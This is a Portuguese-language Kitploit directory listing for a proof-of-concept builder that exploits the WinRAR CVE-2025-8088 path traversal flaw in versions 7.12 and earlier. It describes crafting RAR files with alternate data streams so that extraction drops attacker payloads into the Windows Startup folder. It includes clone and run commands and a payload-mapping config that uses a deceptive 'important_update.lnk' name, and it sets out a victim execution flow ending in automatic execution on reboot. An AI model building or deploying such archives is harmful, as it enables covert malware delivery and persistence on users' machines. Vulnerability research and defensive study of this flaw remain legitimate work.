Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8088-WinRAR-builder — Um exploit de POC para a vulnerabilidade do WinRAR (CVE-2025-8088) que afeta as versões 7.12 e anteriores | Kitploit
Ferramentas/GitHubGitHub/papcaii2004/cve-2025-8088-winrar-builder
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise de MalwareDesenvolvimento de Payloads
GitHubpapcaii2004/cve-2025-8088-winrar-builder

CVE-2025-8088-WinRAR-builder

Um exploit de POC para a vulnerabilidade do WinRAR (CVE-2025-8088) que afeta as versões 7.12 e anteriores

Ver Repositório
1há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-8088-WinRAR-builder

Um POC de exploit para a vulnerabilidade do WinRAR (CVE-2025-8088) que afeta as versões 7.12 e anteriores

🚀 Como Funciona

  1. Cria um RAR incorporado com outros payloads
  2. Usando Múltiplos Streams ADS 🔄 - Anexa streams de payload com diferentes profundidades de path traversal
  3. Manipula Cabeçalhos RAR ⚙️ - Modifica a estrutura do arquivo para explorar a vulnerabilidade de path traversal
  4. Grava o Payload na Inicialização 📂 - Tenta escrever o payload na pasta de inicialização do Windows quando extraído

🛠️ Uso

  1. Clone o repositório
root@kitploit:~
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. Prepare os payloads
root@kitploit:~
mkdir payloads
  • Adicione seus payloads nessa pasta (exe, dll, lnk, ...)
  • Modifique PAYLOAD_MAPPING no script
root@kitploit:~
# 2. Mapeie seu payload para o destino correspondente
#   Formato: (nome_do_arquivo_na_pasta_payloads, destino_de_extração_alvo)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Payload 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Payload 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Payload 3
    # Adicione o seu próprio    
]
  1. Execute o exploit
root@kitploit:~
python builder.py <arquivo_isca>

🔄 Fluxo de Execução

  1. A vítima extrai o RAR com o WinRAR vulnerável (≤7.12)
  2. O payload é gravado na pasta de destino, ex.:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Na próxima reinicialização ➡️ o payload é executado automaticamente

📋 Requisitos

  • Sistema operacional Windows 🪟
  • Python 3.x 🐍
  • WinRAR instalado
Baixar ferramenta